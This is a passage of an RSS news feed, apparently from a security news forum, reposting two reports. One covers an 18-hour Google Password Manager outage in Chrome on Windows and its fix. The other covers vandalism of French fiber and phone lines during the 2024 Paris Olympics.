	<span style="font-size:22px;"><span style="color:#7f8c8d;">Google Password Manager was borked for almost 18 hours</span></span>
</p>

<p>
	 
</p>

<p>
	<span style="color:#2980b9;">Facepalm:</span> If you found yourself unable to access your passwords saved to Chrome last week, don't worry: you weren't alone. Google has apologized for a bug that resulted in around 15 million Windows users being unable to find or save their credentials for almost 18 hours.
</p>

<p>
	The Google Password Manager is used by many of Chrome's 3 billion global users, storing passwords and usernames that can automatically fill the fields in corresponding websites. But millions of people found they could no longer find or save passwords stored in the manager for almost 18 hours starting on July 24.
</p>

<p>
	 
</p>

<p>
	Google says in its incident report that the root cause of the issue was a change in product behavior without a proper feature guard.
</p>

<p>
	The issue was limited to the M127 version of Chrome on Windows. According to Google, 25% of Chrome's 3 billion users saw the configuration change when it was rolled out, which is around 750 million people. Of that number, about 2% experienced the password manager issue, which meant around 15 million people lost access to their passwords.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="2024-07-29-image-13-j.webp" class="ipsImage" data-ratio="75.10" height="405" width="720" src="https://www.techspot.com/images2/news/bigimage/2024/07/2024-07-29-image-13-j.webp" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Google did provide an interim workaround during the incident that involved launching Chrome with a command-line flag: --enable-features=SkipUndecryptablePasswords.
</p>

<p>
	 
</p>

<p>
	A fix was eventually rolled out that just required users to restart the browser. Google says the issue was mitigated for all affected users as of July 27 at 09:27 AM PT.
</p>

<p>
	 
</p>

<p>
	Google has now apologized for any inconvenience the service disruption may have caused. Chrome users who have experienced issues not mentioned in its incident report should contact Google Workspace Support.
</p>

<p>
	 
</p>

<p>
	Any issue that impacts 15 million people is a major one. It comes at a bad time for Windows, given that millions of businesses around the world were thrown into chaos after CrowdStrike's update resulted in a Blue Screen of Death boot loop. It's estimated that around 8.5 million PCs were impacted, and it led to Microsoft working on changes to the operating system's security, including making it significantly more difficult for companies to access the Windows kernel.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.techspot.com/news/104019-google-apologizes-after-15-million-chrome-users-lost.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24502</guid><pubDate>Mon, 29 Jul 2024 16:39:24 +0000</pubDate></item><item><title>Vandalism hits communication lines in France, but the Paris Olympics aren&#x2019;t affected</title><link>https://nsaneforums.com/news/security-privacy-news/vandalism-hits-communication-lines-in-france-but-the-paris-olympics-aren%E2%80%99t-affected-r24500/</link><description><![CDATA[<p>
	PARIS (AP) — The French government says multiple telecommunications lines have been hit by acts of vandalism, affecting fiber lines and fixed and mobile phone lines as cities around France are hosting events for the 2024 Paris Olympics.
</p>

<p>
	 
</p>

<p>
	Organizers for the Paris Games say their operations were not affected. France’s second-largest telecommunications company said it had already made repairs in several areas, or that workarounds had kept the scale of the impact low. Other companies were working on fixes.
</p>

<p>
	The vandalism came after arson attacks hit train networks around France on Friday, hours before the Olympics opening ceremony.
</p>

<p>
	 
</p>

<p>
	Marina Ferrari, secretary of state in charge of digital affairs, posted on X that damage in several regions overnight Sunday to Monday affected telecommunications operators. She said that led to local impact on access to fiber lines and fixed and mobile telephone lines.
</p>

<p>
	 
</p>

<p>
	A French police official said there were issues in at least six of the country’s administrative departments, which include the region around the Mediterranean city of Marseille, hosting Olympic soccer and sailing competitions.
</p>

<p>
	 
</p>

<p>
	Paris 2024 organizers said they have been informed of acts of sabotage on fiber optic networks across several French departments but “we can only confirm that there is no impact on our operations.”
</p>

<p>
	 
</p>

<p>
	SFR, France’s second-largest telecommunications company, said its long-distance network “was the target of acts of vandalism at five points in five departments between 1 a.m. and 3 a.m.”
</p>

<p>
	 
</p>

<p>
	“Maintenance teams are on site to carry out repair work,” SFR said in a statement. It added that the impact of the vandalism acts on its customers was “very low because there are sufficient backups and workarounds.”
</p>

<p>
	 
</p>

<p>
	Up to eight French and international operators, which use SFR’s infrastructure, have been affected, the company also said, adding that full service had already been restored in several areas by Monday afternoon.
</p>

<p>
	 
</p>

<p>
	Telecom operators Bouygues and Free confirmed they were affected. The parent company of Free said its teams are mobilized to restore services.
</p>

<p>
	 
</p>

<p>
	Free said in a statement that an “incident affecting multiple networks is in progress in 11 departments,” including in Marseille. “All our teams have been mobilized to resolve the situation.”
</p>

<p>
	 
</p>

<p>
	A national investigation is underway into last week’s train sabotage, which disrupted travel for nearly a million passengers in France as well as people in London and in other neighboring countries. Train traffic had largely resumed by Monday.
</p>

<p>
	 
</p>

<p>
	French media reported that an extreme-left activist was arrested at a rail facility on Sunday in the Seine-Maritime region of western France. But the Paris prosecutor’s office said it was unconnected to what happened Friday and that no one has been arrested so far in the national investigation into the arson attacks.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://apnews.com/article/olympics-2024-paris-8621154b2fa5c35c4a5f0ff2df78393c" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	<em>Also: <a href="https://www.tomshardware.com/service-providers/network-providers/overnight-fiber-optic-sabotage-disrupts-telecommunications-in-several-french-regions" rel="external nofollow">Overnight fiber optic sabotage disrupts telecommunications in several French regions — Paris and the Olympic Games unaffected.</a></em>
</p>
]]></description><guid isPermaLink="false">24500</guid><pubDate>Mon, 29 Jul 2024 16:10:02 +0000</pubDate></item></channel></rss>
